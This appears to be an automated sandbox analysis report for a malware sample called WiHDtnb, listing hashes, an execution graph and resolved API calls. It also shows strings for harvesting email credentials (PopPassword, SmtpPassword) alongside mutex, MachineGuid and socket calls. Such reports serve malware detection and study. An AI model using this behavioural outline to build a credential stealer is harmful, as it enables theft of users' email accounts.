                            • Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2b90734ed2c27ba539850b8465d0b61d75dc68055f2aa229dee27bf61cb7a1ff
                            • Instruction ID: fa3b830e8ee0aaf20ecc9a88c4aec54db242e4d0caab8dcb79929977c9039301
                            • Opcode Fuzzy Hash: 2b90734ed2c27ba539850b8465d0b61d75dc68055f2aa229dee27bf61cb7a1ff
                            • Instruction Fuzzy Hash: 22B012792A5340AA8105A26C49C8F3B9451EFB1715B90DC113F05C00908965CC78D91B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a91d091756319f945606cfce6e8c4b2bb2dc94b577d40771e2dc7746b54ade9b
                            • Instruction ID: 0d726fca358ee6a29ba82e301a88047db178cb9a5f711c961a74c1560059e2da
                            • Opcode Fuzzy Hash: a91d091756319f945606cfce6e8c4b2bb2dc94b577d40771e2dc7746b54ade9b
                            • Instruction Fuzzy Hash: AAB012FB9347406BFF005150CC46B465370DF70726F845010A60480681E9658663A733
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID: Te]q$Te]q$Te]q$Te]q$Te]q$Te]q$Te]q$$]q$$]q$$]q$$]q
                            • API String ID: 0-2237115325
                            • Opcode ID: 8daa72a064d03ba991927877b9d68c900691c70bfed87c4a3b6f54a6d6fff793
                            • Instruction ID: 903483bdd31142ffc04dcb9a8e849dbb5d89b0e9c0baccbf04d7a335df1dbf1e
                            • Opcode Fuzzy Hash: 8daa72a064d03ba991927877b9d68c900691c70bfed87c4a3b6f54a6d6fff793
                            • Instruction Fuzzy Hash: B5F17D30B44208DFDB149BA8D959BBD7AE7BF88710F644825ED02EB394DB789C41CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID: Te]q$Te]q$Te]q$Te]q$$]q$$]q
                            • API String ID: 0-3261640282
                            • Opcode ID: 3a5bbd529f0555f10daa5a97eefffbb7ff18480fd24cf00fa47beaae997035d1
                            • Instruction ID: cca68ab6a7f78024ef305f52d5386fc0daf5b579072b7fc87a4c41228c3eedc8
                            • Opcode Fuzzy Hash: 3a5bbd529f0555f10daa5a97eefffbb7ff18480fd24cf00fa47beaae997035d1
                            • Instruction Fuzzy Hash: C1E17B30B44208DFDB149BA8D959BBD7AE2BF88721F144825FD06EB394DB789C41CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4']q$4']q$4']q$4']q$4']q
                            • API String ID: 0-4248691736
                            • Opcode ID: 34e8342c904ea208e8d90fd9b040744ff9842ab9dbb91026c2b3f7cb1072ad30
                            • Instruction ID: c692043e088c2e2149af28da5ba3cf42f7cf606884d01d929bb90e013236689d
                            • Opcode Fuzzy Hash: 34e8342c904ea208e8d90fd9b040744ff9842ab9dbb91026c2b3f7cb1072ad30
                            • Instruction Fuzzy Hash: 64213370A0010A9FCF0CEFADE951AEE7BB6FF84704F1044A89145A72A5DF356E058BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4']q$4']q$4']q$4']q$4']q
                            • API String ID: 0-4248691736
                            • Opcode ID: 4be1d12c4a10b78cef164d8f0ec1a881cd9e585161692d5ee5b84417c6cbc54a
                            • Instruction ID: f18cfb91285b0c453bb09b364c7ca3493e1709c3157311bb54ba93e466f2ada0
                            • Opcode Fuzzy Hash: 4be1d12c4a10b78cef164d8f0ec1a881cd9e585161692d5ee5b84417c6cbc54a
                            • Instruction Fuzzy Hash: 54214470A0010A9FCF0CEFADE591AEE7BB6FF84700F1044A88045A72A5DF356E05CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:3%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:1.3%
                            Total number of Nodes:302
                            Total number of Limit Nodes:13
                            execution_graph 8943 408952 8964 40823f 8943->8964 8946 408960 8948 4056bf 2 API calls 8946->8948 8949 40896a 8948->8949 8992 408862 8949->8992 8951 4089c4 8952 413aca 4 API calls 8951->8952 8953 4089d4 8952->8953 8955 405695 2 API calls 8953->8955 8954 408975 8954->8951 9000 4087d6 8954->9000 8957 4089df 8955->8957 8962 402bab 2 API calls 8963 40899d 8962->8963 8963->8951 8963->8962 8965 40824d 8964->8965 8966 40831b 8965->8966 8967 4031e5 3 API calls 8965->8967 8966->8946 8980 4083bb 8966->8980 8968 40826d 8967->8968 8969 4031e5 3 API calls 8968->8969 8970 408289 8969->8970 8971 4031e5 3 API calls 8970->8971 8972 4082a5 8971->8972 8973 4031e5 3 API calls 8972->8973 8974 4082c1 8973->8974 8975 4031e5 3 API calls 8974->8975 8976 4082e2 8975->8976 8977 4031e5 3 API calls 8976->8977 8978 4082ff 8977->8978 8979 4031e5 3 API calls 8978->8979 8979->8966 9028 408363 8980->9028 8983 4084ab 8983->8946 8984 4056bf 2 API calls 8989 4083f4 8984->8989 8985 408492 8986 413aca 4 API calls 8985->8986 8987 4084a0 8986->8987 8988 405695 2 API calls 8987->8988 8988->8983 8989->8985 9031 40815d 8989->9031 9046 40805d 8989->9046 9061 404b8f 8992->9061 8994 40887e 8995 4031e5 3 API calls 8994->8995 8996 40893e 8994->8996 8998 408946 8994->8998 8999 402b7c 2 API calls 8994->8999 8995->8994 9064 404a39 8996->9064 8998->8954 8999->8994 9001 402b7c 2 API calls 9000->9001 9002 4087e7 9001->9002 9003 4031e5 3 API calls 9002->9003 9005 40885a 9002->9005 9007 408802 9003->9007 9004 402bab 2 API calls 9004->9005 9012 408749 9005->9012 9008 40884d 9007->9008 9011 408853 9007->9011 9073 408522 9007->9073 9077 4084b4 9007->9077 9080 4084d4 9008->9080 9011->9004 9013 404b8f 3 API calls 9012->9013 9014 408765 9013->9014 9015 4031e5 3 API calls 9014->9015 9016 408522 3 API calls 9014->9016 9017 4087c7 9014->9017 9019 4087cf 9014->9019 9015->9014 9016->9014 9018 404a39 4 API calls 9017->9018 9018->9019 9020 4085d1 9019->9020 9021 4086c2 9020->9021 9024 4085e9 9020->9024 9021->8963 9023 402bab 2 API calls 9023->9024 9024->9021 9024->9023 9025 4031e5 3 API calls 9024->9025 9086 4089e6 9024->9086 9105 4086c9 9024->9105 9109 4036a3 9024->9109 9025->9024 9029 4031e5 3 API calls 9028->9029 9030 408386 9029->9030 9030->8983 9030->8984 9032 40816f 9031->9032 9033 4081b6 9032->9033 9034 4081fd 9032->9034 9045 4081ef 9032->9045 9036 405872 4 API calls 9033->9036 9035 405872 4 API calls 9034->9035 9037 408213 9035->9037 9038 4081cf 9036->9038 9039 405872 4 API calls 9037->9039 9040 405872 4 API calls 9038->9040 9041 408222 9039->9041 9042 4081df 9040->9042 9043 405872 4 API calls 9041->9043 9044 405872 4 API calls 9042->9044 9043->9045 9044->9045 9045->8989 9047 40808c 9046->9047 9048 4080d2 9047->9048 9049 408119 9047->9049 9060 40810b 9047->9060 9050 405872 4 API calls 9048->9050 9051 405872 4 API calls 9049->9051 9052 4080eb 9050->9052 9053 40812f 9051->9053 9054 405872 4 API calls 9052->9054 9055 405872 4 API calls 9053->9055 9056 4080fb 9054->9056 9057 40813e 9055->9057 9058 405872 4 API calls 9056->9058 9059 405872 4 API calls 9057->9059 9058->9060 9059->9060 9060->8989 9067 404a19 9061->9067 9070 4049ff 9064->9070 9066 404a44 9066->8998 9068 4031e5 3 API calls 9067->9068 9069 404a2c 9068->9069 9069->8994 9071 4031e5 3 API calls 9070->9071 9072 404a12 RegCloseKey 9071->9072 9072->9066 9074 408534 9073->9074 9076 4085af 9074->9076 9083 4084ee 9074->9083 9076->9007 9078 4031e5 3 API calls 9077->9078 9079 4084c7 9078->9079 9079->9007 9081 4031e5 3 API calls 9080->9081 9082 4084e7 9081->9082 9082->9011 9084 4031e5 3 API calls 9083->9084 9085 408501 9084->9085 9085->9076 9087 4031e5 3 API calls 9086->9087 9088 408a06 9087->9088 9089 4031e5 3 API calls 9088->9089 9093 408b21 9088->9093 9092 408a32 9089->9092 9090 408b17 9121 403649 9090->9121 9092->9090 9112 403666 9092->9112 9093->9024 9096 408b0e 9118 40362f 9096->9118 9098 4031e5 3 API calls 9099 408a88 9098->9099 9099->9096 9100 4031e5 3 API calls 9099->9100 9101 408ac4 9100->9101 9102 405b6f 5 API calls 9101->9102 9103 408aff 9102->9103 9103->9096 9115 408508 9103->9115 9106 4086e2 9105->9106 9108 408744 9105->9108 9107 405872 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 9106->9107 9106->9108 9107->9106 9108->9024 9110 4031e5 3 API calls 9109->9110 9111 4036b5 9110->9111 9111->9024 9113 4031e5 3 API calls 9112->9113 9114 403679 9113->9114 9114->9096 9114->9098 9116 4031e5 3 API calls 9115->9116 9117 40851b 9116->9117 9117->9096 9119 4031e5 3 API calls 9118->9119 9120 403642 9119->9120 9120->9090 9122 4031e5 3 API calls 9121->9122 9123 40365c 9122->9123 9123->9093 8101 402c1f 8102 4031e5 3 API calls 8101->8102 8103 402c31 LoadLibraryW 8102->8103 8060 405924 8063 4031e5 8060->8063 8064 4031f3 8063->8064 8065 403236 8063->8065 8064->8065 8067 403208 8064->8067 8074 4030a5 8065->8074 8080 403263 8067->8080 8069 4031e5 3 API calls 8071 403258 8069->8071 8070 40320d 8070->8071 8072 4030a5 3 API calls 8070->8072 8073 403224 8072->8073 8073->8069 8073->8071 8086 402ca4 8074->8086 8076 4030b0 8077 4030b5 8076->8077 8090 4030c4 8076->8090 8077->8073 8081 40326d 8080->8081 8085 4032b7 8081->8085 8099 402b7c GetProcessHeap HeapAlloc 8081->8099 8083 40328c 8084 402b7c 2 API calls 8083->8084 8084->8085 8085->8070 8087 403079 8086->8087 8089 40307c 8087->8089 8094 40317b GetPEB 8087->8094 8089->8076 8091 4030eb 8090->8091 8093 4030c0 8091->8093 8096 402c03 8091->8096 8093->8073 8095 40319b 8094->8095 8095->8089 8097 4031e5 3 API calls 8096->8097 8098 402c15 8097->8098 8098->8093 8100 402b98 8099->8100 8100->8083 8104 4139de 8113 413855 8104->8113 8106 4139f1 8107 413838 GetProcessHeap HeapAlloc GetPEB 8106->8107 8110 4139f7 8107->8110 8108 413866 21 API calls 8109 413a2d 8108->8109 8111 413b81 GetProcessHeap HeapAlloc GetPEB ExitProcess 8109->8111 8110->8108 8112 413a34 8111->8112 8114 4031e5 3 API calls 8113->8114 8115 413864 8114->8115 8115->8115 8059 404df3 WSAStartup 10666 40f980 10681 413c87 10666->10681 10668 40fa19 10669 40fa08 10670 402bab 2 API calls 10669->10670 10670->10668 10671 40f993 10671->10668 10671->10669 10672 40429b 3 API calls 10671->10672 10673 40f9ca 10672->10673 10703 4060bd 10673->10703 10678 412093 6 API calls 10679 40f9f6 10678->10679 10680 412093 6 API calls 10679->10680 10680->10669 10721 413d97 10681->10721 10684 404056 5 API calls 10686 413cad 10684->10686 10685 413c9f 10685->10671 10686->10685 10687 405b6f 5 API calls 10686->10687 10689 413d10 10687->10689 10688 413d7b 10692 402bab 2 API calls 10688->10692 10689->10688 10690 403c62 3 API calls 10689->10690 10691 413d1f 10690->10691 10691->10688 10693 413d5a 10691->10693 10694 413d2c 10691->10694 10692->10685 10696 405b6f 5 API calls 10693->10696 10695 405dc5 3 API calls 10694->10695 10697 413d33 10695->10697 10698 413d55 10696->10698 10697->10698 10700 405b6f 5 API calls 10697->10700 10699 402bab 2 API calls 10698->10699 10699->10688 10701 413d48 10700->10701 10702 402bab 2 API calls 10701->10702 10702->10698 10704 4031e5 3 API calls 10703->10704 10705 4060dd 10704->10705 10706 406126 10705->10706 10707 4031e5 3 API calls 10705->10707 10706->10669 10710 40650a 10706->10710 10708 40610f 10707->10708 10784 40604f 10708->10784 10711 4060ac 3 API calls 10710->10711 10712 406519 10711->10712 10713 4031e5 3 API calls 10712->10713 10714 406529 10713->10714 10715 406599 10714->10715 10716 4031e5 3 API calls 10714->10716 10715->10678 10717 406544 10716->10717 10718 40657f 10717->10718 10720 4031e5 3 API calls 10717->10720 10719 403c40 3 API calls 10718->10719 10719->10715 10720->10718 10722 413da0 10721->10722 10725 413c96 10721->10725 10727 4065a2 10722->10727 10725->10684 10725->10685 10726 405dc5 3 API calls 10726->10725 10742 404a52 10727->10742 10729 406638 10729->10725 10729->10726 10730 4065c0 10730->10729 10754 40393f 10730->10754 10733 406631 10734 402bab 2 API calls 10733->10734 10734->10729 10735 4059d8 3 API calls 10736 4065e9 10735->10736 10738 402b7c 2 API calls 10736->10738 10741 40662a 10736->10741 10737 402bab 2 API calls 10737->10733 10739 4065f8 10738->10739 10740 402bab 2 API calls 10739->10740 10740->10741 10741->10737 10743 402b7c 2 API calls 10742->10743 10745 404a65 10743->10745 10744 404ac6 10744->10730 10745->10744 10746 4031e5 3 API calls 10745->10746 10747 404a8a RegOpenKeyExA 10746->10747 10748 404aa0 10747->10748 10749 404aca 10747->10749 10750 4031e5 3 API calls 10748->10750 10751 402bab 2 API calls 10749->10751 10752 404ab1 RegQueryValueExA 10750->10752 10751->10744 10753 404a39 4 API calls 10752->10753 10753->10744 10761 403843 10754->10761 10757 403969 10757->10733 10757->10735 10759 403961 10760 402bab 2 API calls 10759->10760 10760->10757 10762 403861 10761->10762 10763 402b7c 2 API calls 10762->10763 10765 403875 10763->10765 10764 403923 10764->10757 10780 403aef 10764->10780 10765->10764 10766 4031e5 3 API calls 10765->10766 10767 40389b 10766->10767 10767->10764 10768 4031e5 3 API calls 10767->10768 10769 4038c5 10768->10769 10770 40392a 10769->10770 10772 403666 3 API calls 10769->10772 10771 403649 3 API calls 10770->10771 10771->10764 10773 4038e7 10772->10773 10773->10770 10774 4031e5 3 API calls 10773->10774 10775 403901 10774->10775 10775->10770 10776 403911 10775->10776 10777 40362f 3 API calls 10776->10777 10778 403919 10777->10778 10779 403649 3 API calls 10778->10779 10779->10764 10781 403afc 10780->10781 10782 402b7c 2 API calls 10781->10782 10783 403b16 10782->10783 10783->10759 10785 4031e5 3 API calls 10784->10785 10786 406062 10785->10786 10786->10706

                            Control-flow Graph

                            APIs
                            • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                            • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                            • GetLastError.KERNEL32 ref: 0041399E
                            Memory Dump Source
                            • Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd
                            Yara matches
                            Similarity
                            • API ID: Error$CreateLastModeMutex
                            • String ID:
                            • API String ID: 3448925889-0
                            • Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                            • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                            • Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                            • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                              • Part of subcall function 00402B7C: HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                            • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                            • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                            Memory Dump Source
                            • Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3676486918-0
                            • Opcode ID: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                            • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                            • Opcode Fuzzy Hash: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                            • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 82 404df3-404e16 WSAStartup
                            APIs
                            • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                            Memory Dump Source
                            • Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd
                            Yara matches
                            Similarity
                            • API ID: Startup
                            • String ID:
                            • API String ID: 724789610-0
                            • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                            • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                            • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                            • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 83 402c1f-402c37 call 4031e5 LoadLibraryW
                            APIs
                            • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                            Memory Dump Source
                            • Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                            • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                            • Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                            • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 86 413a3f-413a57 call 4031e5 ExitProcess
                            APIs
                            • ExitProcess.KERNEL32(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54
                            Memory Dump Source
                            • Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                            • Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
                            • Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                            • Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 89 4049ff-404a18 call 4031e5 RegCloseKey
                            APIs
                            • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                            Memory Dump Source
                            • Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                            • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                            • Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                            • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CoInitialize.OLE32(00000000), ref: 0040438F
                            • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                            • VariantInit.OLEAUT32(?), ref: 004043C4
                            • SysAllocString.OLEAUT32(?), ref: 004043CD
                            • VariantInit.OLEAUT32(?), ref: 00404414
                            • SysAllocString.OLEAUT32(?), ref: 00404419
                            • VariantInit.OLEAUT32(?), ref: 00404431
                            Memory Dump Source
                            • Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd
                            Yara matches
                            Similarity
                            • API ID: InitVariant$AllocString$CreateInitializeInstance
                            • String ID:
                            • API String ID: 1312198159-0
                            • Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                            • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                            • Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                            • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                            • API String ID: 0-2111798378
                            • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                            • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                            • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                            • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                            • HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                            Memory Dump Source
                            • Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocProcess
                            • String ID:
                            • API String ID: 1617791916-0
                            • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                            • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                            • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                            • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                            Memory Dump Source
                            • Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd
                            Yara matches
                            Similarity
                            • API ID: recv
                            • String ID:
                            • API String ID: 1507349165-0
                            • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                            • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                            • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                            • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                            • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                            • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                            • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd
                            Yara matches
                            Similarity
                            • API ID: _wmemset$ErrorLast
                            • String ID: IDA$IDA
                            • API String ID: 887189805-2020647798
                            • Opcode ID: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                            • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                            • Opcode Fuzzy Hash: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                            • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                            • socket.WS2_32(?,?,?), ref: 00404E7A
                            • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                            Memory Dump Source
                            • Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd
                            Yara matches
                            Similarity
                            • API ID: freeaddrinfogetaddrinfosocket
                            • String ID:
                            • API String ID: 2479546573-0
                            • Opcode ID: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
